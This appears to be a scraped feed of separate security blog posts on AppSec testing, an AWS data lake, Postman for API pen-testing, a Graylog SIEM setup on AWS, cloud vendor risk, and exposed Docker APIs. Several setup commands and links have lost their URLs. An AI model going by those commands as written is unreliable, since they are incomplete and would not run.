A recent Ponemon Institute study found that 88 percent of cybersecurity teams spend at least 25 hours per week investigating and detecting application vulnerabilities, and 83 percent spend at least that much time on remediation efforts. While it’s certainly necessary to have these teams in place to continuously investigate and remediate incidents, they should ideally focus on vulnerabilities that cannot be found by other means.

A strong presence in the software delivery life cycle will allow other teams to handle more of the common and easier-to-fix issues. For a start this St. Patrick’s Day, consider establishing an application security “shamrock” that includes:

  • Static application security testing (SAST) for developer source code changes;
  • Dynamic application security testing (DAST) for key integration stages and milestones; and
  • Open-source software (OSS) to identify vulnerabilities in third-party software.

You can enhance each of these elements by leveraging automation, intelligence and machine learning capabilities. Over time, you can implement additional testing capabilities, such as interactive application security testing (IAST), penetration testing and runtime application self-protection (RASP), for more advanced insight, detection and remediation.

Get Off to a Clean Start This Spring

In the Northern Hemisphere, St. Patrick’s Day comes near the start of spring, and what better time to think about new beginnings for your security program. Start by incorporating application security in your delivery pipeline early and often to more quickly identify and remediate vulnerabilities. Before long, you’ll find that your security team has much more time to deal with more critical flaws and incidents. With developers and security personnel working in tandem, the organization will be in a much better position to release high-quality applications that lead to greater consumer trust, lower risk and fewer breaches.

The post Application Security Has Nothing to Do With Luck appeared first on Security Intelligence.

How Our Threat Analytics Multi-Region Data Lake on AWS Stores More, Slashes Costs

Data is the lifeblood of digital businesses, and a key competitive advantage. The question is: how can you store your data cost-efficiently, access it quickly, while abiding by privacy laws?

At Imperva, we wanted to store our data for long-term access. Databases would’ve cost too much in disk and memory, especially since we didn’t know much it would grow, how long we would keep it, and which data we would actually access in the future. The only thing we did know? That new business cases for our data would emerge.

That’s why we deployed a data lake. It turned out to be the right decision, allowing us to store 1,000 times more data than before, even while slashing costs.

What is a data lake?

A data lake is a repository of files stored in a distributed system. Information is stored in its native form, with little or no processing. You simply store the data in its native formats, such as JSON, XML, CSV, or text.

Analytics queries can be run against both data lakes and databases. In a database you create a schema, plan your queries, and add indices to improve performance. In a data lake, it’s different — you simply store the data and it’s query-ready.

Some file formats are better than others, of course. Apache Parquet allows you to store records in a compressed columnar file. The compression saves disk space and IO, while the columnar format allows the query engine to scan only the relevant columns. This reduces query time and costs.

Using a distributed file system lets you store more data at a lower cost. Whether you use Hadoop HDFS, AWS S3, or Azure Storage, the benefits include:

  • Data replication and availability
  • Options to save more money – for example, AWS S3 has different storage options with different costs
  • Retention policy – decide how long you want to keep your data before it’s automatically deleted

No wonder experts such as Adrian Cockcroft, VP of cloud architecture strategy at Amazon Web Services, said this week that “cloud data lakes are the future.”

Analytic queries: data lake versus database

Let’s examine the capabilities, advantages and disadvantages of a data lake versus a database.

The data

A data lake supports structured and unstructured data and everything in-between. All data is collected and immediately ready for analysis. Data can be transformed to improve user experience and performance. For example, fields can be extracted from a data lake and data can be aggregated.

A database contains only structured and transformed data. It is impossible to add data without declaring tables, relations and indices. You have to plan ahead and transform the data according to your schema.

Figure 1: Data Lake versus Database

The Users

Most users in a typical organization are operational, using applications and data in predefined and repetitive ways. A database is usually ideal for these users. Data is structured and optimized for these predefined use-cases. Reports can be generated, and filters can be applied according to the application’s design.

Advanced users, by contrast, may go beyond an application to the data source and use custom tools to process the data. They may also bring in data from outside the organization.

The last group are the data experts, who do deep analysis on the data. They need the raw data, and their requirements change all the time.

Data lakes support all of these users, but especially advanced and expert users, due to the agility and flexibility of a data lake.

Figure 2: Typical user distribution inside an organization

Query engine(s)

In a database, the query engine is internal and is impossible to change. In a data lake, the query engine is external, letting users choose based on their needs. For example, you can choose Presto for SQL-based analytics and Spark for machine learning.

Figure 3: A data lake may have multiple external query engines. A database has a single internal query engine.

Support of new business use-case

Database changes may be complex. Data should be analyzed and formatted, while schema has to be created before data can be inserted. If you have a busy development team, users can wait months or a year to see the new data in their application.

Few businesses can wait this long. Data lakes solve this by letting users go beyond the structure to explore data. If this proves fruitful, than a formal schema can be applied. You get to results quickly, and fail fast. This agility lets organizations quickly improve their use cases, better know their data, and react fast to changes.

Figure 4: Support of new business use-case

Data lake structure

Here’s how data may flow inside a data lake.

Figure 5: Data lake structure and flow

In this example, CSV files are added to the data lake to a “current day” folder. This folder is the daily partition which allows querying a day’s data using a filter like day = ‘2018-1-1’. Partitions are the most efficient way to filter data.

The data under tables/events is an aggregated, sorted and formatted version of the CSV data. It uses the parquet format to improve query performance and for compression. It also has an additional “type” partition, because most queries work only on a single event type. Each file has millions of records inside, with metadata for efficiency. For example, you can know the count, min and max values for all of the columns without scanning the file.

This events table data has been added to the data lake after the raw data has been validated and analyzed.

Here is a simplified example of CSV to Parquet conversion:

Figure 6: Example for conversion of CSV to Parquet

Parquet files normally hold large number of records, and can be divided internally into “row groups” which have their own metadata. Repeating values improves compression and the columnar structure allows scanning only the relevant columns. The CSV data can be queried at any time, but it is not as efficient as querying the data under the tables/events data.

Flow and Architecture


Imperva’s data lake uses Amazon Web Services (AWS). Below shows the flow and services we used to build it.

Figure 7: Architecture and flow

Adding data (ETL – Extract -> Transform -> Load)

  • We use Kafka, which is a producer-consumer distributed streaming platform. Data is added to Kafka, and later read by a microservice which create raw Parquet files in S3.
  • Another microservice uses AWS Athena to hourly or daily process the data – filter, partition, and sort and aggregate it into new Parquet files
  • This flow is done on each of the AWS regions we support

Figure 8: SQL to Parquet flow example

Technical details:

  • Each partition creation is done by one or more Athena:
  • Each query result with one more more Parquet files
  • ETL microservices run on a Kubernetes cluster per region. They are developed and deployed using our development pipeline.


  • Different microservices consume the aggregated data using Athena API through boto3 Python library
  • Day to day queries are done using SQL client like DBeaver with Athena JDBC driver. Athena AWS management console is also used for SQL queries
  • Apache Spark engine is used to run spark queries, including machine learning using the spark-ml Apache Zeppelin is used as a client to run scripts and display visualization. Both Spark and Zeppelin are installed as part of AWS EMR service.

Multi-region queries

Data privacy regulations such as GDPR add a twist, especially since we store data in multiple regions. There are two ways to perform multi-region queries:

  • Single query engine based in one of the regions
  • Query engine per region – get results per region and perform an aggregation

With a single query engine you can run SQL on data from multiple regions, BUT data is transferred between regions, which means you pay both in performance and cost.

With a query engine per region you have to aggregate the results, which may not be a simple task.

With AWS Athena – both options are available, since you don’t need to manage your own query engine.

Threat Analytics Data Lake – before and after

Before the data lake, we had several database solutions – relational and big data. The relational database couldn’t scale, forcing us to delete data or drop old tables. Eventually, we did analytics on a much smaller part of the data than we wanted.

With the big data solutions, the cost was high. We needed dedicated servers, and disks for storage and queries. That’s overkill: we don’t need server access 24/7, as daily batch queries work fine. We also did not have strong SQL capabilities, and found ourselves deleting data because we did not to pay for more servers.

With our data lake, we get better analytics by:

  • Storing more data (billions of records processed daily!), which is used by our queries
  • Using SQL capabilities on a large amount of data using Athena
  • Using multiple query engines with different capabilities, like Spark for machine learning
  • Allowing queries on multiple regions for an average, acceptable response time of just 3 seconds

In addition we also got the following improvements:

  • Huge cost reductions in storage and compute
  • Reduced server maintenance

In conclusion – a data lake worked for us. AWS services made it easier for us to get the results we wanted at an incredibly low cost. It could work for you, depending on factors such as the amount of data, its format, use cases, platform and more. We suggest learning your requirements and do a proof-of-concept with real data to find out!

The post How Our Threat Analytics Multi-Region Data Lake on AWS Stores More, Slashes Costs appeared first on Blog.

Better API Penetration Testing with Postman – Part 1

This is the first of a multi-part series on testing with Postman. I originally planned for it to be one post, but it ended up being so much content that it would likely be overwhelming if not divided into multiple parts. So here’s the plan: In this post, I’ll give you an introduction to setting up Postman and using it to issue your regular request. In Part 2, I’ll have you proxying Postman through Burp Suite. In Part 3, we’ll deal with more advanced usage of Postman, including handling Bearer tokens and Environment variables more gracefully. In Part 4, I’ll pull in one or two Burp plugins that can really augment Postman’s behavior for pen-testing.

In this day and age, web and mobile applications are often backed by RESTful web services. Public and private APIs are rampant across the internet and testing them is no trivial task. There are tools that can help. While (as always with pen-testing) tools are no substitute for skill, even the most skilled carpenter will be able to drive nails more efficiently with a hammer than with a shoe.

One such tool is Postman, which has been popular with developers for years. Before we get into how to set it up, here’s a quick overview of what Postman is and does. Postman is a commercial desktop application, available for Windows, Mac OS, and Linux. It is available for free, with paid tiers providing collaboration and documentation features. These features are more relevant to developers than penetration testers. It manages collections of HTTP requests for testing various API calls, along with environments containing variables. This does not replace your proxy (Burp, ZAP, Mitmproxy, etc), but actually stands in as the missing browser and client application layer. Main alternatives are open-source tools Insomnia and Advanced REST Client, commercial option SoapUI, or custom tooling built around Swagger/Swagger UI or curl.

Setting Up Postman

Postman is available from its official website at, as an installer for Windows and MacOS, and a tarball for Linux. It can also be found in a Snap for Ubuntu (, and other community-maintained repos such as the AUR for Arch Linux. The first step to setting it up is, of course, to install it.

Upon first launching Postman, you’ll be greeted with a screen prompting you to Create an Account, Sign up with Google, or sign in with existing credentials. However, Postman doesn’t require an account to use the tool. 

The account is used for collaborating/syncing/etc; the paid tier features. As I mentioned earlier, they’re great for developers but you probably don’t care for them. In fact, if you generally keep your clients confidential, like we do at Secure Ideas, you probably explicitly don’t want to sync your project to another 3rd party server.

If you look down near the bottom of the window, there’s some light gray text that reads Skip signing in and take me straight to the app. Click that, and you will move to the next screen – a dialog prompting you to create stuff.

There are several parts you’re not going to use here, so let’s look at the three items that you actually care about:

  • Collection – a generic container you can fill with requests. It can also act as a top-level object for some configuration choices, like Authentication rules, which we’ll expand on later.
  • Request – the main purpose for being here. These are the HTTP requests you will be building out, with whatever methods, bodies, etc. you want to use. These must always be in a Collection.
  • Environment – holds variables that you want to control in one place and use across requests or even across collections.

The Basics of Working with Postman

It’s time to create our first Postman Collection and start making requests.

The New button in the top left is what you will use for creating Collections and Requests, typically. Start by creating a Collection. This is sort of like an individual application scope. You will use to group related requests.

A collection can also act as a top-level item with Authentication instructions that will be inheritable for individual requests.

For now, just name it something, and click the Create button. I called mine Test Collection.

By default, you will have an unnamed request tab open already. Let’s take a tour of that portion of the UI.

  1. The active tab
  2. The name of this request. This is just some descriptive name you can provide for it.
  3. The HTTP Method. This drop-down control lets you change the method for this request.
  4. The URL for the request. This is the full path, just as if it was in your browser.
  5. The tabbed interface for setting various attributes of the request, including Parameters, Headers, Body, etc.
  6. The send button. This actually submits the request to the specified URL, as it is currently represented in the editor.
  7. The save button. The first time you click this, you will need to specify your collection, as the request must belong to a collection.

I have a sample target set up at http://localhost:4000, so I’m going to start by filling in this request and saving it to my collection. It’s going to be a POST, to http://localhost:4000/legacy/auth, without any parameters (what can I say? It’s a test API. It’ll let anyone authenticate). When I click the Save button, I will name the request and select the Collection for it, as below.

Then I’ll click Save to Test Collection (adjust for your collection name) to save my request. Now, clicking the Send button will issue the request. Then I will see the Response populated in the lower pane of the window, as below.

  1. The tab interface has the Body, Cookies, Headers, and Test Results. We haven’t written any tests yet, but notice the badges indicating the response returned 1 cookie and 6 headers.
  2. The actual response body is in the larger text pane.
  3. We have options for pretty-printing or Raw response body, and a drop-down list for different types (I believe this is pre-populated by the content-type response header). There’s also a soft-wrap button there in case you have particularly wide responses.
  4. Metrics about the response, including HTTP Status Code, Time to respond, and Size of response.

A Side-Note about Cookies

Now, if we reissue our request with Postman, we’ll notice an important behavior: the cookie that the previous respnse had set will be included automatically. This mimics what a browser normally does for you. Just as you would expect from the browser, any requests Postman issues within that cookie’s scope will automatically include that cookie.

What if you want to get rid of a cookie?
That’s easy. Just below the Send button in Postman, there’s a Link-like button that says Cookies. Click that, and it will open a dialog where you can delete or edit any cookies you need to.

And that’s it in a nutshell for Cookie-based APIs. But let’s face it: it’s more common for APIs to use Bearer tokens than it is to have them use Cookies, today. We’ll address that in the upcoming section, along with some other, more advanced concepts.

What’s Next

In Part 2, we’ll proxy Postman through Burp Suite, and talk about the advantages of that approach.
In Part 3, we’ll dig into some more advanced usage of Postman.
In Part 4, we’ll use some Burp Suite extensions to augment Postman.

How to Deploy a Graylog SIEM Server in AWS and Integrate with Imperva Cloud WAF

Security Information and Event Management (SIEM) products provide real-time analysis of security alerts generated by security solutions such as Imperva Cloud Web Application Firewall (WAF). Many organizations implement a SIEM solution to bring visibility of all security events from various solutions and to have the ability to search them or create their own dashboard.

Note that a simpler alternative to SIEM is Imperva Attack Analytics, which reduces the burden of integrating a SIEM logs solution and provides a condensed view of all security events into comprehensive narratives of events rated by severity. A demo of Imperva Attack Analytics is available here.

This article will take you step-by-step through the process of deploying a Graylog server that can ingest Imperva SIEM logs and let you review your data. They are:

  • Step 1: Deploy a new Ubuntu server on AWS
  • Step 2: Install java, Mongodb, elasticsearch
  • Step 3: Install Graylog
  • Step 4: Configure the SFTP server on the AWS server
  • Step 5: Start pushing SIEM logs from Imperva Incapsula

The steps apply to the following scenario:

  • Deployment as a stand-alone EC2 on AWS
  • Installation from scratch, from a clean Ubuntu machine (not a graylog AMI in AWS)
  • Single server setup, where the logs are located in the same server as Graylog
  • Push of the logs from Imperva using SFTP

Most of the steps below also apply to any setup or cloud platforms besides AWS. Note that in AWS, a Graylog AMI image does exist, but only with Ubuntu 14 at the time of writing. Also, I will publish future blogs on how to parse your Imperva SIEM logs and how to create a dashboard to read the logs.

Step 1: Deploy an Ubuntu Server on AWS

As a first step, let’s deploy an Ubuntu machine in AWS with the 4GB RAM required to deploy Graylog.

  1. Sign in to the AWS console and click on EC2
  2. Launch an instance and select.
  3. Select Ubuntu server 16.04, with no other software pre-installed.

It is recommended to use Ubuntu 16.04 and above, as some repo are already pre-included such as MongoDB and Java openjdk-8-jre, which simplifies the installation process. The command lines below apply for Ubuntu 16.04 (systemctl command, for instance, is not applicable for Ubuntu 14).

4. Select the Ubuntu server with 4GB RAM.

4GB is the minimum for Graylog, but you might consider more RAM depending on the volume of the data that you plan to gather.

5. Optional: increase the disk storage.

 Since we will be collecting logs, we will need more storage than the default space. The storage volume will depend a lot on the site traffic and the type of logs you will retrieve (all traffic logs or only security events logs).

Note that you will likely require much more than 40GB. If you are deploying on AWS, you can easily increase the capacity of your EC2 server anytime.

6. Select an existing key pair so you can connect to your AWS server via SSH later.

If you do not have an existing SSH key pair in your AWS account, you can create it using the ssh-keygen tool, which is part of the standard openSSH installation or using puttygen on Windows. Here’s a guide to creating and uploading your SSH key pairs.

7. Give your EC2 server a clear name and identify its public DNS and IPv4 addresses.

8. Configure the server security group in AWS.

Let’s make sure that port 9000 in particular is open. You might need to open other ports if logs are forwarded from another log collector, such as port 514 or 5044.

It is best practice that you open port 22 only from Cloud WAF IP (this link) or from your IP. Prevent from opening port 22 to the world.

You can also consider locking the UI access to your public IP only.

9. SSH to your AWS server with the Ubuntu user, after uploading your key in Putty and putting the AWS public DNS entry.

10. Update your Ubuntu system to the latest versions and updates.

sudo apt-get update

sudo apt-get upgrade

Select “y” when prompted or the default options offered.

Step 2: Install Java, MongoDB and Elasticsearch

11. Install additional packages including Java JDK.

sudo apt-get install apt-transport-https openjdk-8-jre-headless uuid-runtime pwgen

Check that Java is properly installed by running:

java -version

And check the version installed. If all is working properly, you should see a response like:12. Install MongoDB. Graylog uses MongoDB to store the Graylog configuration data

MongoDB is included in the repos of Ubuntu 16.04 and works with Graylog 2.3 and above.

sudo apt-get install mongodb-server

Start mongoDB and make sure it starts with the server:

sudo systemctl start mongod

sudo systemctl enable mongod

And we can check that it is properly running by:

sudo systemctl status mongod

13. Install and configure Elasticsearch

Graylog 2.5.x can be used with Elasticsearch 5.x. You can find more instructions in the Elasticsearch installation guide:

wget -qO – | sudo apt-key add –

echo “deb stable main” | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list

sudo apt-get update && sudo apt-get install elasticsearch

Now modify the Elasticsearch configuration file located at /etc/elasticsearch/elasticsearch.yml and set the cluster name to graylog.

sudo nano /etc/elasticsearch/elasticsearch.yml

Additionally you need to uncomment (remove the # as first character) the line: graylog

Now, you can start Elasticsearch with the following commands:

sudo systemctl daemon-reload
sudo systemctl enable elasticsearch.service
sudo systemctl restart elasticsearch.service

By running sudo systemctl status elasticsearch.service you should see Elasticsearch up and running as below:

Step 3: Install Graylog

14. We can now install Graylog repository and Graylog itself with the following commands:

sudo dpkg -i graylog-2.5-repository_latest.deb

sudo apt-get update && sudo apt-get install graylog-server

15. Configure Graylog

First, create a password of at least 64 characters by running the following command:

pwgen -N 1 -s 96

And copy the result referenced below as password

Let’s create its sha256 checksum as required in the Graylog configuration file:

echo -n password | sha256sum

Now you can open the Graylog configuration file:

sudo nano /etc/graylog/server/server.conf

And replace password_secret and root_password_sha2 with the values you created above.

The configuration file should look as below (replace with your own generated password):

Now replace the following entries with your AWS CNAME that was given when creating your EC2 instance. Note that also, depending on your setup, you can replace the alias below with your internal IP.


web:16. Optional: Configure HTTPS for the Graylog web interface

Although not mandatory, it is recommended that you configure https to your Graylog server.

Please find the steps to setup https in the following link:

17. Start the Graylog service and enable it on system startup

Run the following commands to restart Graylog and enforce it on the server startup:

sudo systemctl daemon-reload
sudo systemctl enable graylog-server.service
sudo systemctl start graylog-server.service

Now we can check that Graylog has properly started:

sudo systemctl status graylog-server.service18. Login to the Graylog console

You should now be able to login to the console.

If the page is not loading at all, check if you have properly configured the security group of your instance and that port 9000 is open.

You can login with username ‘admin’ and the password you set as your secret password.

Step 4: Configure SFTP on your server and Imperva Cloud WAF SFTP push

19. Create a new user and its group

Let’s create a directory where the logs will be sent to Incapsula to send logs.

sudo.adduser incapsula

incapsula is the user name created in this example. You can replace it to the name of your choice. You will be prompted to choose a password.

Let’s create a new group:

sudo groupadd incapsulagroup

And associate the incapsula user to this group

sudo usermod -a -G incapsulagroup incapsula  

20. Let’s create a directory where the logs will be sent to

In this example, we will send all log to /home/incapsula/logs

cd /home

sudo mkdir incapsula

cd incapsula

sudo mkdir logs

21. Now let’s set strict permissions restrictions to that folder

For security purposes, we want to restrict access of this user strictly to the folder where the logs will be sent. The home and incapsula folders can be owned by root while logs will be owned by our newly created user.

sudo chmod 755 /home/incapsula

sudo chown root:root /home/incapsula

Now let’s assign our new user (incapsula in our example) as the owner of the logs directory:

sudo chown -R incapsula:incapsulagroup /home/incapsula/logs

The folder is now owned by incapsula and belongs to incapsulagroup.

And you can see that the incapsula folder is restricted to root, so the newly created incapsula user can only access the /home/incapsula/logs folder, to send its logs.

22. Now let’s configure open-ssh SFTP server and set the appropriate security restrictions.

sudo nano /etc/ssh/sshd_config

Comment out this section:

#Subsystem sftp /usr/lib/openssh/sftp-server

And add this line right below:

subsystem sftp internal-sftp

Change the authentication to allow password authentication so Incapsula can send logs using username / password authentication:

PasswordAuthentication yes

And add the following lines at the bottom of the document:

match group incapsulagroup

chrootDirectory /home/incapsula

X11Forwarding no

AllowTcpForwarding no
ForceCommand internal-sftp
PasswordAuthentication yes

Save the file and exit.

Let’s now restart the SSH server:

sudo service sshd restart

23. Now let’s check that we can send files using SFTP

For that, let’s open use Filezilla and try to upload a file. If everything worked properly, you should be able to:

  • Connect successfully
  • See the logs folder, and be unable to navigate
  • Copy a file to the remote server

Step 5: Push the logs from Imperva Incapsula to the Graylog SFTP folder

24. Configure the Logs in Imperva Cloud WAF SIEM logs tab

  • Log into your account.
  • On the sidebar, click Logs > Log Setup
    • Make sure you have SIEM logs license enabled.
  • Select the SFTP option
  • In the host section enter your public facing AWS hostname. Note that your security group should be open to Incapsula IPs as described in the Security Group section earlier.
  • Update the path to log
  • For the first testing, let’s disable encryption and compression.
  • Select CEF as log format
  • Click Save

See below an example of the settings. Click Test Connection and ensure it is successful. Click Save.

25. Make sure the logs are enabled for the relevant sites as below

You can select either security logs or all access logs on a site-per-site basis.

Selecting All Logs will retrieve all access logs, while Security Logs will push only logs where security events were raised.

  • Note that selecting All Logs will have a significant impact on the volume of logs.

You can find more details on the various settings of the SIEM logs integration in Imperva documentation in this link.

26. Verify that logs are getting pushed from Incapsula servers to your FTP folder


The first logs might take some time to reach your server, depending on the volume of traffic on the site, in particular for a site with little traffic. Generate some traffic and events.

27. Enhance performance and security

To improve the security and performance of your SIEM integration project, you can consider enforcing https in Graylog. You can find a guide to configure https on Graylog here.

 That’s it! In my next blogs, we will describe how to start collecting and parsing Imperva and Incapsula logs using Graylog and how to create your first dashboard.

If you have suggestions for improvements or updates in any of the steps, please share with the community in the comments below.

The post How to Deploy a Graylog SIEM Server in AWS and Integrate with Imperva Cloud WAF appeared first on Blog.

Security Considerations for Whatever Cloud Service Model You Adopt

Companies recognize the strategic importance of adopting a cloud service model to transform their operations, but there still needs to be a focus on mitigating potential information risks with appropriate cloud security considerations, controls and requirements without compromising functionality, ease of use or the pace of adoption. We all worry about security in our business and personal lives, so it’s naturally a persistent concern when adopting cloud-based services — and understandably so. However, research suggests that cloud services are now a mainstream way of delivering IT requirements for many companies today and will continue to grow in spite of any unease about security.

According to Gartner, 28 percent of spending within key enterprise IT markets will shift to the cloud by 2022, which is up from 19 percent in 2018. Meanwhile, Forrester reported that cloud platforms and applications now drive the full spectrum of end-to-end business technology transformations in leading enterprises, from the key systems powering the back office to mobile apps delivering new customer experiences. More enterprises are using multiple cloud services each year, including software-as-a-service (SaaS) business apps and cloud platforms such as infrastructure-as-a-service (IaaS) and platform-as-a-service (PaaS), both on-premises and from public service providers.

What Is Your Cloud Security Readiness Posture?

The state of security readiness for cloud service adoption varies between companies, but many still lack the oversight and decision-making processes necessary for such a migration. There is a greater need for alignment and governance processes to manage and oversee a cloud vendor relationship. This represents a shift in responsibilities, so companies need to adequately staff, manage and maintain the appropriate level of oversight and control over the cloud service. As a result, a security governance and management model is essential for cloud services that can be found in a cloud vendor risk management program.

A cloud vendor risk management program requires careful consideration and implementation, but not a complete overhaul of your company’s entire cybersecurity program. The activities in the cloud vendor risk management program are intended to assist companies in approaching security in a consistent manner, regardless of how varied or unique the cloud service may be. The use of standard methods helps ensure there is reliable information on which to base decisions and actions. It also reinforces the ability to proactively evaluate and mitigate the risks cloud vendors introduce to the business. Finally, standard cloud vendor risk management methods can help distinguish between different types of risks and manage them appropriately.

Overlooked Security Considerations for Your Cloud Service Model

A cloud vendor risk management program provides a tailored set of security considerations, controls and requirements within a cloud computing environment through a phased life cycle approach. Determining cloud security considerations, controls and requirements is an ongoing analytical activity to evaluate the cloud service models and potential cloud vendors that can satisfy existing or emerging business needs.

All cloud security controls and requirements possess a certain level of importance based on risk, and most are applicable regardless of the cloud service. However, some elements are overlooked more often than others, and companies should pay particular attention to the following considerations to protect their cloud service model and the data therein.

Application Security

  • Application exposure: Consider the cloud vendor application’s overall attack surface. In a SaaS cloud environment, the applications offered by the cloud vendor often have broader exposure, which increases the attack surface. Additionally, those applications often still need to integrate back to other noncloud applications within the boundaries of your company or the cloud vendor enterprise.
  • Application mapping: Ensure that applications are aligned with the capabilities provided by cloud vendors to avoid the introduction of any undesirable features or vulnerabilities.
  • Application design: Pay close attention to the design and requirements of an application candidate and request a test period from the cloud vendor to rule out any possible issues. Require continuous communication and notification of major changes to ensure that compatibility testing is included in the change plans. SaaS cloud vendors will typically introduce additional features to improve the resilience of their software, such as security testing or strict versioning. Cloud vendors can also inform your company about the exact state of its business applications, such as specific software logging and monitoring, given their dedicated attention to managing reputation risk and reliance on providing secure software services and capabilities.
  • Browser vulnerabilities: Harden web browsers and browser clients. Applications offered by SaaS cloud vendors are accessible via secure communication through a web browser, which is a common target for malware and attacks.
  • Service-oriented architecture (SOA): Conduct ongoing assessments to continuously identify any application vulnerabilities, because the SOA libraries are maintained by the cloud vendor and not completely visible to your company. By using the vendor-provided SOA library, you can develop and test applications more quickly because SOA provides a common framework for application development.

Data Governance

  • Data ownership: Clearly define data ownership so the cloud vendor cannot refuse access to data or demand fees to return the data once the service contracts are terminated. SaaS cloud vendors will provide the applications and your company will provide the data.
  • Data disposal: Consider the options for safe disposal or destruction of any previous backups. Proper disposal of data is imperative to prevent unauthorized disclosure. Replace, recycle or upgrade disks with proper sanitization so that the information no longer remains within storage and cannot be retrieved. Ensure that the cloud vendor takes appropriate measures to prevent information assets from being sent without approval to countries where the data can be disclosed legally.
  • Data disposal upon contract termination: Implement processes to erase, sanitize and/or dispose of data migrated into the cloud vendor’s application prior to a contract termination. Ensure the details of applications are not disclosed without your company’s authorization.
  • Data encryption transmission requirements: Provide encryption of confidential data communicated between a user’s browser and a web-based application using secure protocols. Implement encryption of confidential data transmitted between an application server and a database to prevent unauthorized interception. Such encryption capabilities are generally provided as part of, or an option to, the database server software. You can achieve encryption of confidential file transfers through protocols such as Secure FTP (SFTP) or by encrypting the data prior to transmission.

Contract Management

  • Transborder legal requirements: Validate whether government entities in the hosting country require access to your company’s information, with or without proper notification. Implement necessary compliance controls and do not violate regulations in other countries when storing or transmitting data within the cloud vendor’s infrastructure. Different countries have different legal requirements, especially concerning personally identifiable information (PII).
  • Multitenancy: Segment and protect all resources allocated to a particular tenant to avoid disclosure of information to other tenants. For example, when a customer no longer needs allocated storage, it may be freely reallocated to another customer. In this case, wipe data thoroughly.
  • Network management: Determine network management roles and responsibilities with the cloud vendor. Within a SaaS implementation, the cloud vendor is entirely responsible for the network. In other models, the responsibility of the network is generally shared, but there will be exceptions.
  • Reliability: Ensure the cloud vendor has service-level agreements that specify the amount of allowable downtime and the time it will take to restore service in the event of an unexpected disruption.
  • Exit strategy: Develop an exit strategy for the eventual transition away from the cloud vendor considering tools, procedures and other offerings to securely facilitate data or service portability from the cloud vendor to another or bring services back in-house.

IT Asset Governance

  • Patch management: Determine the patch management processes with the cloud vendor and ensure there is ongoing awareness and reporting. Cloud vendors can introduce patches in their applications quickly without the approval or knowledge of your company because it can take a long time for a cloud vendor to get formal approval from every customer. This can result in your company having little control or insight regarding the patch management process and lead to unexpected side effects. Ensure that the cloud vendor hypervisor manager allows the necessary patches to be applied across the infrastructure in a short time, reducing the time available for a new vulnerability to be exploited.
  • Virtual machine security maintenance: Partner with cloud vendors that allow your company to create virtual machines (VM) in various states such as active, running, suspended and off. Although cloud vendors could be involved, the maintenance of security updates may be the responsibility of your company. Assess all inactive VMs and apply security patches to reduce the potential for out-of-date VMs to become compromised when activated.

Accelerate Your Cloud Transformation

Adopting cloud services can be a key steppingstone toward achieving your business objectives. Many companies have gained substantial value from cloud services, but there is still work to be done. Even successful companies often have cloud security gaps, including issues related to cloud security governance and management. Although it may not be easy, it’s critical to perform due diligence to address any gaps through a cloud vendor risk management program.

Cloud service security levels will vary, and security concerns will always be a part of any company’s transition to the cloud. But implementing a cloud vendor risk management program can certainly put your company in a better position to address these concerns. The bottom line is that security is no longer an acceptable reason for refusing to adopt cloud services, and the days when your business can keep up without them are officially over.

The post Security Considerations for Whatever Cloud Service Model You Adopt appeared first on Security Intelligence.

Severe Flaw Disclosed In StackStorm DevOps Automation Software

A security researcher has discovered a severe vulnerability in the popular, open source event-driven platform StackStorm that could allow remote attackers to trick developers into unknowingly execute arbitrary commands on targeted services. StackStorm, aka "IFTTT for Ops," is a powerful event-driven automation tool for integration and automation across services and tools that allows

Imperva Wins Awards for Best Database Security, Coolest Cloud Security Vendor

SC Magazine has long been one of the most respected names in cybersecurity journalism, and one that has written about Imperva’s security research and solutions many times.

So we’re proud to announce that we’ve won the 2019 SC Award for Best Database Security solution at SC’s awards ceremony on March 5th in San Francisco. Held nearby to the RSA Conference 2019, the SC Awards also honored Imperva as a Finalist for Best Web Application Security.

Imperva’s been on a roll awards-wise. Just two weeks ago, CRN magazine named Imperva one of its Top 20 Coolest Cloud Vendors for security. That same month, CRN profiled two of our executives, VP Jim Ritchings and Senior Director Kirt Jorgenson, in its list of 2019 Channel Chiefs. Meanwhile, our AAP solution, which automatically safeguards applications from new and unknown threats, was named a Silver Winner in the Cybersecurity Excellence Awards 2019.

And going back to the end of last year, Imperva Attack Analytics was named a finalist for best security solution in CRN’s Tech Innovator Award, while our Web Application Firewall (WAF) was named one of the best in 2018 by enterprise customers surveyed by Gartner Peer Insights.

See a full list of Imperva honors here.

Why do our capabilities, especially in data security and cloud, win recognition from customers and experts alike? Because Imperva not only secures your data from theft, we also simplify compliance with vital regulations such as GDPR, SOX, PCI, HIPAA, and more. For instance, our Discovery and Assessment capability automatically finds unknown databases, classifies sensitive data, and detects database vulnerabilities. Data Activity Monitoring and Protection reliably monitors and protects databases with little or no impact on performance or availability. We standardize audit across all your databases, enabling organizations to automate compliance whether your databases are on-premises or in the cloud.

Our Data Risk Analytics capability uses machine learning and user data behavior analytics to distill millions of alerts to pinpoint suspicious activity and provide actionable insights in plain language. Our efficient data collection and processing means we require less than half the number of appliances as our primary competitor. And it helped one customer, a computer manufacturer, lower their cost of ownership by 70%. Finally, our Data Masking feature reduces risk in non-production environments by replacing large volumes of sensitive data easily with realistic fictional data.

Through our FlexProtect licensing plans, your enterprise has access to our suite of data security and application security capabilities, which you can quickly deploy wherever your applications and data are located — on-premises, in the cloud, in multiple clouds, or all of the above. And as customers continue moving their applications to the cloud, they can be confident that Imperva will migrate our security there, too.

With FlexProtect, there’s no risk of complicated, inflexible security licenses failing to cover your hybrid data infrastructure or slowing down your digital transformation.

We are at the RSA Conference all week at Booth 527 in the South Expo. Come down and meet our experts to learn more about our data and application security solutions and how our new FlexProtect plans can be as agile as your organization needs to be. Or follow up with us at

The post Imperva Wins Awards for Best Database Security, Coolest Cloud Security Vendor appeared first on Blog.

Hundreds of Vulnerable Docker Hosts Exploited by Cryptocurrency Miners

Docker is a technology that allows you to perform operating system level virtualization. An incredible number of companies and production hosts are running Docker to develop, deploy and run applications inside containers.

You can interact with Docker via the terminal and also via remote API. The Docker remote API is a great way to control your remote Docker host, including automating the deployment process, control and get the state of your containers, and more. With this great power comes a great risk — if the control gets into the wrong hands, your entire network can be in danger.

In February, a new vulnerability (CVE-2019-5736) was discovered that allows you to gain host root access from a docker container.  The combination of this new vulnerability and exposed remote Docker API can lead to a fully compromised host.

According to Imperva research, exposed Docker remote API has already been taken advantage of by hundreds of attackers, including many using the compromised hosts to mine a lesser-known-albeit-rising cryptocurrency for their financial benefit.

In this post you will learn about:

  • Publicly exposed Docker hosts we found
  • The risk they can put organizations in
  • Protection methods

